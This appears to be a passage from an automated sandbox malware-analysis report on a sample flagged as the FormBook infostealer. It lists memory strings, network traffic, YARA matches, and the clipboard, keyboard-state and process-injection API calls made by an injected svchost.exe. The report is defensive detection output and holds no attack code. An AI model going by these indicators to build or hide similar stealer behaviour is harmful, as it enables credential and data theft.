                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.coE
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/e4T
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifes
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/pets/5-most-disobedient-dog-breeds-you-can-own/ar-AA1hGJfv
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money
                Source: explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personaI
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
                Source: explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/a-fifth-head-for-mount-rushmore-here-are-seven-famous-conten
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/candy-riddles-free-match-3-puzzle/cg-9p391mr74hss
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnlts
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/krunker-frvr/cg-9mw6fcv4wcgf
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/master-chess/cg-9nrl2nj7l6s1
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/mergest-kingdom/cg-9pc19rxfzl82
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/microsoft-freecell-solitaire/cg-msfreecell
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/microsoft-jewel-2/cg-ms
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/microsoft-solitaire-collection/cg-mssolitaireco
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/186709?utm
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0038407C
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0038427A
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0038407C
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0037003A
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0039CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0039CB26

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.2530150136.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576193206.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575534372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2253215877.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254186644.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575741699.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254236592.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2528476866.0000000003A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: This is a third-party compiled AutoIt script.0_2_00313B4C
                Source: N4533DWG.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: N4533DWG.exe, 00000000.00000000.1255030448.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6f5dae96-8
                Source: N4533DWG.exe, 00000000.00000000.1255030448.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_9e1ccdcf-0
                Source: N4533DWG.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d14e18a4-3
                Source: N4533DWG.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_59bd3444-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CB23 NtClose,2_2_0042CB23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
